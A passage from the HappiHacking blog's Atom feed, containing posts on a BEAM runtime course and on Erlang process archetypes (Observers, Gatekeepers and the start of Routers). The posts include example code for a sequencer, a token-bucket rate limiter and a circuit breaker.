&lt;p&gt;Many years ago, in my PhD thesis, I quoted a line from a Dan Fogelberg
song:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;The days are empty and the nights are unreal.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
</content>
  </entry>
  
  <entry>
    <title>Why I Built a Course on the BEAM</title>
    <link href="https://happihacking.com/blog/posts/2026/why_I_built_a_course_on_the_beam/"/>
    <updated>2026-03-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/why_I_built_a_course_on_the_beam/</id>
    <summary>Understanding the runtime changes how you build on it.</summary>
    <content type="html">&lt;h1 id=&quot;why-i-built-a-course-on-the-beam&quot; tabindex=&quot;-1&quot;&gt;Why I Built a Course on the BEAM&lt;/h1&gt;
&lt;p&gt;Programming languages shape how we think. When the tool matches the
problem, work becomes calmer. You see the system more clearly, and you
spend less time fighting accidental complexity.&lt;/p&gt;
&lt;p&gt;That lesson is one reason I keep returning to the BEAM, the runtime behind Erlang and Elixir.&lt;/p&gt;
&lt;p&gt;At HappiHacking, we spend a lot of time on systems that need to stay
reliable, maintainable, and fast. In that kind of work, the BEAM keeps
proving its value. It gives you cheap processes, clear failure boundaries,
supervision, message passing, and a runtime designed for long-lived
systems. Those qualities matter when downtime is expensive and concurrency
is part of the job.&lt;/p&gt;
&lt;h2 id=&quot;many-teams-still-meet-the-beam-only-at-the-surface&quot; tabindex=&quot;-1&quot;&gt;Many Teams Still Meet the BEAM Only at the Surface&lt;/h2&gt;
&lt;p&gt;They learn enough Erlang or Elixir to ship features. They use OTP
behaviours, build services, and get real value quickly. Then the harder
questions arrive. A mailbox starts growing. Latency becomes uneven across
nodes. Memory behaves differently under real traffic. Recovery takes longer
than expected.&lt;/p&gt;
&lt;p&gt;That gap between using the BEAM and understanding the BEAM is where this
course lives.&lt;/p&gt;
&lt;h2 id=&quot;a-stronger-mental-model&quot; tabindex=&quot;-1&quot;&gt;A Stronger Mental Model&lt;/h2&gt;
&lt;p&gt;I built this course for developers who want a stronger mental model of the
runtime. The aim is simple: help you reason more clearly about why BEAM
systems behave as they do, and what to do when they do not behave the way
you expected.&lt;/p&gt;
&lt;p&gt;In the course, we look at schedulers, processes, mailboxes, memory
behaviour, garbage collection, messaging, and the failure modes that tend
to appear under real load. We also cover how to design concurrent systems
using &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;process archetypes&lt;/a&gt; and
the &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;Gnome Village&lt;/a&gt; metaphor, a
way of thinking about BEAM systems as small, specialized workers
cooperating in a shared environment.&lt;/p&gt;
&lt;p&gt;Better mental models usually lead to better designs, faster diagnosis, and
fewer avoidable surprises in production. You should leave with a clearer
way to inspect live systems, better instincts for what to measure, and a
firmer grasp of how to tune a system.&lt;/p&gt;
&lt;h2 id=&quot;who-this-course-is-for&quot; tabindex=&quot;-1&quot;&gt;Who This Course Is For&lt;/h2&gt;
&lt;p&gt;This course is especially useful for teams building backend systems where
reliability matters. Fintech is one obvious example, but it is not the only
one. Messaging systems, internal platforms, transactional services, and
other high-concurrency backends face many of the same pressures. If your
system needs to survive changing load and keep its shape over time, a
deeper understanding of the BEAM pays back quickly.&lt;/p&gt;
&lt;p&gt;I have spent much of my career working close to languages, runtimes, and
systems that need to keep working. My PhD focused on compiling Erlang.
Later I worked on Scala at EPFL. At Klarna, I joined early enough to help
shape both the system and the engineering organization as it grew. Across
those experiences, the pattern has been fairly consistent: performance
follows understanding, and reliable systems begin with the right mental
model.&lt;/p&gt;
&lt;p&gt;That is what this course is meant to provide.&lt;/p&gt;
&lt;p&gt;It is for developers who want to move beyond cargo-cult OTP. It is for
teams that want calmer operations, better debugging habits, and more
confidence when systems come under pressure. It is for people who suspect
that the BEAM has more to teach them than syntax and conventions.&lt;/p&gt;
&lt;h2 id=&quot;join-a-session&quot; tabindex=&quot;-1&quot;&gt;Join a Session&lt;/h2&gt;
&lt;p&gt;The next public session is at
&lt;a href=&quot;https://www.elixirconf.eu/#training&quot;&gt;ElixirConf EU in Malaga on April 22&lt;/a&gt;,
a full-day training the day before the conference. Early bird pricing ends
March 11.&lt;/p&gt;
&lt;p&gt;You can also book a private workshop for your team. For private training,
I can tailor the material to your architecture, your failure modes, and
the questions your team is already facing.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.elixirconf.eu/&quot;&gt;Register for ElixirConf EU&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://happihacking.com/contact/?subject=Private%20BEAM%20Workshop&quot;&gt;Book a private workshop&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Observers: The Watchful Gnomes of the Village</title>
    <link href="https://happihacking.com/blog/posts/2025/observers/"/>
    <updated>2025-12-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/observers/</id>
    <summary>Processes that watch, restart, and enforce lifetimes</summary>
    <content type="html">&lt;h1 id=&quot;observers-the-watchful-gnomes-of-the-village&quot; tabindex=&quot;-1&quot;&gt;Observers: The Watchful Gnomes of the Village&lt;/h1&gt;
&lt;p&gt;Some gnomes in the village don’t build bridges, bake bread, or carry mail.
They stand on a hill, hold a lantern, and keep an eye on everyone else.
When something goes wrong, they react. They don’t fix the problem
themselves—they simply make sure the right thing happens next.&lt;/p&gt;
&lt;p&gt;These are &lt;strong&gt;Observers&lt;/strong&gt;.
Their job is to keep the system healthy.&lt;/p&gt;
&lt;p&gt;Observers come in two useful forms: &lt;strong&gt;Sentinels&lt;/strong&gt; and &lt;strong&gt;Supervisors&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;sentinels&quot; tabindex=&quot;-1&quot;&gt;Sentinels&lt;/h1&gt;
&lt;p&gt;A Sentinel watches a process or a condition and acts when reality drifts
away from expectations. Timeouts, deadlines, stalled workers, mailbox
growth, missing responses—these are all things a Sentinel can detect.&lt;/p&gt;
&lt;h3 id=&quot;minimal-example&quot; tabindex=&quot;-1&quot;&gt;Minimal example&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_info(check, #state{pid = Pid, threshold = N} = S) -&amp;gt;
    case process_info(Pid, message_queue_len) of
        {message_queue_len, Len} when Len &amp;gt; N -&amp;gt;
            S#state.alert_target ! {overload, Pid, Len};
        _ -&amp;gt;
            ok
    end,
    erlang:send_after(1000, self(), check),
    {noreply, S}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A small loop, a single condition, and an alert.
That’s a Sentinel.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;supervisors&quot; tabindex=&quot;-1&quot;&gt;Supervisors&lt;/h1&gt;
&lt;p&gt;Supervisors are the managers of the gnome village. They don’t write code,
carry letters, or fix bridges. They make sure the gnomes who do those
things show up for work, behave themselves, and get replaced when they fall
into the river.&lt;/p&gt;
&lt;p&gt;A Supervisor enforces the structure of the system. It starts processes,
restarts them when they crash, and escalates when failures repeat. It is
the backbone of OTP fault-tolerance.&lt;/p&gt;
&lt;p&gt;Supervisors never do real work. They only make sure the workers are alive,
in the right teams, and following the rules. If a Supervisor starts doing
work, it has stopped being a manager and started being a liability.&lt;/p&gt;
&lt;h3 id=&quot;conceptual-example&quot; tabindex=&quot;-1&quot;&gt;Conceptual example&lt;/h3&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;init([]) -&amp;gt;
    {ok, {
        {one_for_one, 5, 10},
        [
            {worker1, {worker1, start_link, []}, permanent, 5000, worker, []}
        ]
    }}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One rule: workers may fail. Supervisors may not.&lt;/p&gt;
&lt;p&gt;A supervisor can still terminate when its children fail too quickly and the
restart rules require escalation. That is intentional. It pushes failure
upward until it reaches a level that can handle it.&lt;/p&gt;
&lt;p&gt;But a supervisor should never fail because of its own code. It should have
no business logic, no parsing, no calculations and nothing that can crash
by accident. Its job is to start children, restart them and apply the
restart strategy.&lt;/p&gt;
&lt;p&gt;This separation is why large BEAM systems stay stable even when individual
processes fail repeatedly. Workers fail often. Supervisors fail only when
the failure belongs at their level.&lt;/p&gt;
&lt;p&gt;They keep the rest of the gnomes working without taking the whole village
down. When things really go wrong, they escalate the alarm cleanly and
predictably up the tree.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;the-observer-mindset&quot; tabindex=&quot;-1&quot;&gt;The Observer Mindset&lt;/h1&gt;
&lt;p&gt;Observers have a simple philosophy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Let processes run freely.&lt;/li&gt;
&lt;li&gt;Let them crash when they must.&lt;/li&gt;
&lt;li&gt;Notice when they do.&lt;/li&gt;
&lt;li&gt;Clean up, restart, or alert.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Observers are the safety rails of the system.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h1&gt;
&lt;p&gt;Observers keep the system alive:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sentinels&lt;/strong&gt; watch and raise alerts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supervisors&lt;/strong&gt; restart and maintain structure.&lt;/li&gt;
&lt;/ul&gt;
</content>
  </entry>
  
  <entry>
    <title>Gatekeepers: The Traffic Controllers of the Gnome Village</title>
    <link href="https://happihacking.com/blog/posts/2025/gatekeepers/"/>
    <updated>2025-12-08T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/gatekeepers/</id>
    <summary>Processes that protect the system from the outside world, and from itself</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gatekeeper_4.png&quot; alt=&quot;The Gatekeeper Gnome&quot; title=&quot;The Gatekeeper Gnome&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;gatekeepers-the-traffic-controllers-of-the-gnome-village&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers: The Traffic Controllers of the Gnome Village&lt;/h1&gt;
&lt;p&gt;In every gnome village you eventually discover a small, serious-looking
gnome standing on a bridge, holding a sign.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You Shall Not Pass!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;He is not there to forward messages. He is not there to do work.
He is there to &lt;strong&gt;limit how much chaos reaches the rest of the village&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;That gnome is the Gatekeeper.&lt;/p&gt;
&lt;p&gt;Gatekeepers control &lt;em&gt;flow&lt;/em&gt;: how fast, how often, and under what conditions
messages move into the next part of the system. They protect scarce
resources, absorb bursts, and stop cascading failures from spreading
downstream.&lt;/p&gt;
&lt;p&gt;A Gatekeeper is not a Router.&lt;/p&gt;
&lt;p&gt;A Gatekeeper is not a Worker.&lt;/p&gt;
&lt;p&gt;A Gatekeeper cares about &lt;strong&gt;when&lt;/strong&gt; something happens, not just &lt;strong&gt;where&lt;/strong&gt; it
goes.&lt;/p&gt;
&lt;p&gt;This post defines the Gatekeeper archetype, shows the common subtypes, and
explains how to use them without accidentally turning them into
bottlenecks.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-is-a-gatekeeper&quot; tabindex=&quot;-1&quot;&gt;What Is a Gatekeeper?&lt;/h1&gt;
&lt;p&gt;A Gatekeeper enforces one rule:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;“Not everything gets through. And not everything gets through at
once.”&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Where Workers do work and Routers forward messages, Gatekeepers &lt;strong&gt;regulate&lt;/strong&gt; traffic:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;They serialize or sequence flows.&lt;/li&gt;
&lt;li&gt;They protect slow or fragile subsystems.&lt;/li&gt;
&lt;li&gt;They turn unbounded input into bounded throughput.&lt;/li&gt;
&lt;li&gt;They absorb bursts and provide backpressure.&lt;/li&gt;
&lt;li&gt;They cut off failing downstream systems before everything collapses.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Gatekeeper owns &lt;em&gt;coordination&lt;/em&gt;, not domain state.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-gatekeepers-are-not&quot; tabindex=&quot;-1&quot;&gt;What Gatekeepers Are Not&lt;/h1&gt;
&lt;p&gt;To keep this archetype clean, two clarifications:&lt;/p&gt;
&lt;h3 id=&quot;not-a-router&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Not a Router&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gatekeepers do not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;decide destinations&lt;/li&gt;
&lt;li&gt;classify messages&lt;/li&gt;
&lt;li&gt;route between processes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Router shapes &lt;strong&gt;direction&lt;/strong&gt;.
A Gatekeeper shapes &lt;strong&gt;rate and order&lt;/strong&gt;.&lt;/p&gt;
&lt;h3 id=&quot;not-a-resource-owner&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Not a Resource Owner&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Gatekeepers do not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;store domain data&lt;/li&gt;
&lt;li&gt;own sessions or connections&lt;/li&gt;
&lt;li&gt;maintain business invariants&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Resource Owner holds state.
A Gatekeeper holds &lt;strong&gt;flow control&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeeper-subtypes&quot; tabindex=&quot;-1&quot;&gt;Gatekeeper Subtypes&lt;/h1&gt;
&lt;p&gt;Gatekeepers appear in three main forms. Every one of them exists to prevent
a subsystem from being overloaded or corrupted by timing.&lt;/p&gt;
&lt;h2 id=&quot;1-flow-controller&quot; tabindex=&quot;-1&quot;&gt;1. Flow Controller&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;also called Sequencer or Coordinator&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ensures only one message at a time enters a subsystem. Useful when the
target must process tasks in strict order or must not have concurrent
invocations.&lt;/p&gt;
&lt;p&gt;Sometimes “one at a time” is not enough. You also need &lt;strong&gt;in-order
delivery&lt;/strong&gt;, even if messages arrive out of order.&lt;/p&gt;
&lt;p&gt;A Sequencer Gatekeeper works a bit like TCP:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;each message carries a &lt;strong&gt;sequence number&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;the Sequencer keeps track of the &lt;strong&gt;next expected&lt;/strong&gt; number,&lt;/li&gt;
&lt;li&gt;out-of-order messages are &lt;strong&gt;buffered&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;only in-order messages are forwarded.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Gatekeeper does not do the work. It only decides &lt;strong&gt;when&lt;/strong&gt; a message is
allowed to move on.&lt;/p&gt;
&lt;p&gt;Here is a minimal, slightly contrived example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% sequencer.erl
-record(state, {
    next_seq    = 0,          %% next expected sequence number
    pending     = #{} ,       %% #{Seq =&amp;gt; Msg}
    downstream                 %% pid() of the real worker
}).

%% Public API: send a sequenced message
send(Pid, Seq, Msg) -&amp;gt;
    gen_server:cast(Pid, {seq, Seq, Msg}).

%% Callbacks

handle_cast({seq, Seq, Msg}, #state{next_seq = Next, pending = Pending} = S) -&amp;gt;
    %% Store message in pending buffer
    Pending1 = maps:put(Seq, Msg, Pending),
    %% Try to flush any in-order messages
    S1 = S#state{pending = Pending1},
    {noreply, flush_in_order(S1)}.

flush_in_order(#state{next_seq = Next,
                      pending  = Pending,
                      downstream = Down} = S) -&amp;gt;
    case maps:take(Next, Pending) of
        {Msg, Pending1} -&amp;gt;
            %% We have the next message, forward it
            gen_server:cast(Down, {ordered, Next, Msg}),
            flush_in_order(S#state{next_seq = Next + 1,
                                   pending  = Pending1});
        error -&amp;gt;
            %% Missing message; stop here and wait
            S
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This Sequencer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;accepts &lt;code&gt;{Seq, Msg}&lt;/code&gt; in any order,&lt;/li&gt;
&lt;li&gt;forwards them to &lt;code&gt;Down&lt;/code&gt; in &lt;strong&gt;strict sequence order&lt;/strong&gt;,&lt;/li&gt;
&lt;li&gt;buffers anything that arrives early,&lt;/li&gt;
&lt;li&gt;never touches the domain logic of &lt;code&gt;Msg&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In other words, the Sequencer is a tiny user-space TCP: it uses sequence
numbers and a buffer to guarantee ordered delivery, without doing the work
itself.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;2-rate-limiter&quot; tabindex=&quot;-1&quot;&gt;2. Rate Limiter&lt;/h2&gt;
&lt;p&gt;Controls &lt;strong&gt;how often&lt;/strong&gt; something happens.&lt;/p&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;“Max 100 requests per second to this PSP”&lt;/li&gt;
&lt;li&gt;“Only 5 ledger writes per second per user”&lt;/li&gt;
&lt;li&gt;“Batch up to N messages before flushing”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Rate limiters create backpressure:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If upstream is too fast → they wait or reject.&lt;/li&gt;
&lt;li&gt;If downstream is slow → they smooth the load.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Typical pattern:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-record(state, {
    tokens,
    max_tokens,
    refill_ms
}).

%% Start by scheduling the first refill:
init(MaxTokens, RefillMs) -&amp;gt;
    erlang:send_after(RefillMs, self(), refill),
    {ok, #state{tokens = MaxTokens,
                max_tokens = MaxTokens,
                refill_ms = RefillMs}}.


%% A simple token bucket
handle_call({request, Msg}, _From, #state{tokens = T} = S) when T &amp;gt; 0 -&amp;gt;
    Next = S#state{tokens = T - 1},
    forward(Msg),
    {reply, ok, Next};

handle_call({request, _Msg}, _From, S) -&amp;gt;
    {reply, {error, rate_limited}, S}.

%% Refill on each tick
handle_info(refill, #state{max_tokens = Max, refill_ms = Ms} = S) -&amp;gt;
    %% Reset token count
    S1 = S#state{tokens = Max},

    %% Schedule next refill
    erlang:send_after(Ms, self(), refill),

    {noreply, S1}.

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Gatekeepers don’t try to be “helpful.” They enforce limits.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;3-circuit-breaker&quot; tabindex=&quot;-1&quot;&gt;3. Circuit Breaker&lt;/h2&gt;
&lt;p&gt;A Circuit Breaker is the gnome who says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“We tried this four times and it exploded every time.
Maybe let’s not.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A Circuit Breaker stops calls to a subsystem that is failing and only
retries after a cooldown.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;About the Words “Open” and “Closed”&lt;/p&gt;
&lt;p&gt;The term circuit breaker comes from electricity.
Unfortunately the metaphor brings its vocabulary with it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;open → no current flows → no calls allowed&lt;/li&gt;
&lt;li&gt;closed → current flows → calls allowed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My little brain finds this backwards for software.
“Open” sounds like things should pass through.
“Closed” sounds like nothing should.&lt;/p&gt;
&lt;p&gt;To avoid confusing myself, I use passing
(calls allowed) and blocked (calls rejected).
If you prefer open and closed, that’s fine, just be careful.
The metaphor is older and stronger than you think,
and it tends to drag its meaning along with it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-record(state, {
    mode           = passing,   %% passing | blocked
    failures       = 0,
    threshold      = 3,         %% failures before blocking
    backoff_ms     = 1000,      %% current backoff
    min_backoff_ms = 1000,
    max_backoff_ms = 30000,
    retry_at_ms    = 0,         %% monotonic time in ms
    target,                     %% pid() or {Mod, Fun} etc
    call_timeout   = 5000       %% ms
}).

%% Public API
%% A guarded call through the breaker
call(Pid, Request) -&amp;gt;
    gen_server:call(Pid, {call, Request}).
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_call({call, Request}, _From, S0) -&amp;gt;
    Now = now_ms(),
    case S0#state.mode of
        passing -&amp;gt;
            do_checked_call(Request, S0, Now);

        blocked -&amp;gt;
            case Now &amp;gt;= S0#state.retry_at_ms of
                false -&amp;gt;
                    %% Still blocked, do not hit downstream at all
                    {reply, {error, breaker_blocked}, S0};
                true -&amp;gt;
                    %% Retry window has opened: allow one trial call
                    do_checked_call(Request, S0, Now)
            end
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;now_ms() -&amp;gt;
    erlang:monotonic_time(millisecond).
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;do_checked_call(Request, S0, Now) -&amp;gt;
    case safe_call(S0#state.target, Request, S0#state.call_timeout) of
        {ok, Result} -&amp;gt;
            %% Success: reset failures, mode, and backoff
            S1 = S0#state{
                mode        = passing,
                failures    = 0,
                backoff_ms  = S0#state.min_backoff_ms,
                retry_at_ms = 0
            },
            {reply, {ok, Result}, S1};

        {error, Reason} -&amp;gt;
            handle_failure(Reason, S0, Now)
    end.

&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;safe_call(Target, Request, Timeout) when is_pid(Target) -&amp;gt;
    try gen_server:call(Target, Request, Timeout) of
        Reply -&amp;gt; {ok, Reply}
    catch
        Class:Error -&amp;gt;
            {error, {Class, Error}}
    end;
safe_call({M, F}, Request, Timeout) -&amp;gt;
    %% or whatever abstraction you like
    try M:F(Request, Timeout) of
        Reply -&amp;gt; {ok, Reply}
    catch
        Class:Error -&amp;gt;
            {error, {Class, Error}}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;handle_failure(Reason, S0, Now) -&amp;gt;
    Fail1 = S0#state.failures + 1,
    case Fail1 &amp;gt;= S0#state.threshold of
        false -&amp;gt;
            %% Below threshold: still passing, but report failure
            S1 = S0#state{failures = Fail1},
            {reply, {error, {downstream_failed, Reason}}, S1};

        true -&amp;gt;
            %% Threshold reached: switch to blocked and back off
            Backoff0 = S0#state.backoff_ms,
            Max      = S0#state.max_backoff_ms,
            Backoff1 = min(Backoff0 * 2, Max),
            RetryAt  = Now + Backoff1,
            S1 = S0#state{
                mode        = blocked,
                failures    = Fail1,
                backoff_ms  = Backoff1,
                retry_at_ms = RetryAt
            },
            {reply, {error, {downstream_failed,
                             Reason, breaker_blocked}}, S1}
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We use exponential backoff with a cap: start at min_backoff_ms double each
time never exceed max_backoff_ms. On the first success after failures, we
reset backoff to min_backoff_ms.&lt;/p&gt;
&lt;p&gt;Behaviour in plain words&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;While things work:
mode = passing, all calls go through
failures reset to 0&lt;/li&gt;
&lt;li&gt;When failures pile up (≥ threshold):
breaker enters mode = blocked
sets retry_at_ms = now + backoff_ms
returns {error, breaker_blocked} without touching the target&lt;/li&gt;
&lt;li&gt;After the backoff period:
first caller after retry_at_ms will trigger a trial call
if it succeeds: reset to passing
if it fails: stay blocked, increase backoff, set new retry_at_ms&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is what you want in front of a flaky PSP or slow third-party service:
protect the rest of the system, limit damage, and probe occasionally for
recovery.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeepers-and-backpressure&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers and Backpressure&lt;/h1&gt;
&lt;p&gt;Backpressure is the polite way of saying:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Slow down. Or no.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Gatekeepers apply backpressure by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;delaying messages&lt;/li&gt;
&lt;li&gt;rejecting messages&lt;/li&gt;
&lt;li&gt;collapsing bursts&lt;/li&gt;
&lt;li&gt;pushing the problem upstream instead of downstream&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Routers do not do this.
Workers do not do this.
Only Gatekeepers regulate flow.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeepers-and-isolation-boundaries&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers and Isolation Boundaries&lt;/h1&gt;
&lt;p&gt;Gatekeepers often sit at &lt;strong&gt;domain boundaries&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;between API → ledger&lt;/li&gt;
&lt;li&gt;between ledger → PSP&lt;/li&gt;
&lt;li&gt;between ingestion → analytics&lt;/li&gt;
&lt;li&gt;between users → sessions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Anywhere unbounded input meets bounded capacity, you need a Gatekeeper.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;a-note-about-latency&quot; tabindex=&quot;-1&quot;&gt;A Note About Latency&lt;/h1&gt;
&lt;p&gt;Gatekeepers introduce latency &lt;strong&gt;on purpose&lt;/strong&gt;.
This is not a bug.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rate limiters smooth spikes&lt;/li&gt;
&lt;li&gt;Flow controllers enforce serialization&lt;/li&gt;
&lt;li&gt;Circuit breakers prevent retries from spiraling&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the BEAM, a few microseconds of routing latency is irrelevant compared to the stability gained.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;summary&quot; tabindex=&quot;-1&quot;&gt;Summary&lt;/h1&gt;
&lt;p&gt;Gatekeepers protect the system from excess:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Flow Controllers serialize work&lt;/li&gt;
&lt;li&gt;Rate Limiters regulate volume&lt;/li&gt;
&lt;li&gt;Circuit Breakers isolate failure&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Where Routers shape &lt;em&gt;direction&lt;/em&gt;, Gatekeepers shape &lt;em&gt;timing&lt;/em&gt;.
They are the village’s quiet traffic controllers, ensuring the rest of the gnomes can do their work without panic.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Routers: Processes That Only Decide Where Stuff Goes</title>
    <link href="https://happihacking.com/blog/posts/2025/routers/"/>
    <updated>2025-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/routers/</id>
    <summary>The Gnome Village Mailmen</summary>
    <content type="html">&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/gnome_routers.png&quot; alt=&quot;The Gnome
Village Post Office.&quot; title=&quot;The Gnome
Village Post Office.&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;routers-the-gnome-village-mailmen&quot; tabindex=&quot;-1&quot;&gt;Routers: The Gnome Village Mailmen&lt;/h1&gt;
&lt;p&gt;Routers are the mailmen of the gnome village. They don’t bake bread, run
shops, or manage anything. They stand at the sorting table, look at the
envelope, read the address, and forward the message to the right place.&lt;/p&gt;
&lt;p&gt;That is the entire job description. If a Router starts doing anything other
than sorting and delivering mail, it has stopped being a Router and started
being something else.&lt;/p&gt;
&lt;p&gt;This post defines the Router archetype, shows the common subtypes, and
explains how to keep Routers from drifting into Gatekeeper or Observer
territory.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-is-a-router&quot; tabindex=&quot;-1&quot;&gt;What is a Router?&lt;/h1&gt;
&lt;p&gt;A Router does one thing, in four small steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Receive a message&lt;/li&gt;
&lt;li&gt;(Optionally) inspect it&lt;/li&gt;
&lt;li&gt;Decide where it should go&lt;/li&gt;
&lt;li&gt;Forward it&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Nothing more.&lt;/p&gt;
&lt;p&gt;Preferably with no side effects, no domain logic, no shared state, and no
flow control. Occasional logging or trivial routing logic is fine, but
anything beyond that belongs to another archetype.&lt;/p&gt;
&lt;p&gt;Routers &lt;strong&gt;shape message flow&lt;/strong&gt;. They do not own it, regulate it, or
interpret it. They simply send each message to its destination.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-a-router-is-not&quot; tabindex=&quot;-1&quot;&gt;What a Router Is Not&lt;/h1&gt;
&lt;p&gt;Before we define the subtypes, it’s important to keep the boundaries clean.&lt;/p&gt;
&lt;p&gt;A Router is &lt;strong&gt;not&lt;/strong&gt; a Gatekeeper. It does not:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;limit, throttle, or sequence messages&lt;/li&gt;
&lt;li&gt;enforce ordering&lt;/li&gt;
&lt;li&gt;block or regulate flow&lt;/li&gt;
&lt;li&gt;protect a resource&lt;/li&gt;
&lt;/ul&gt;
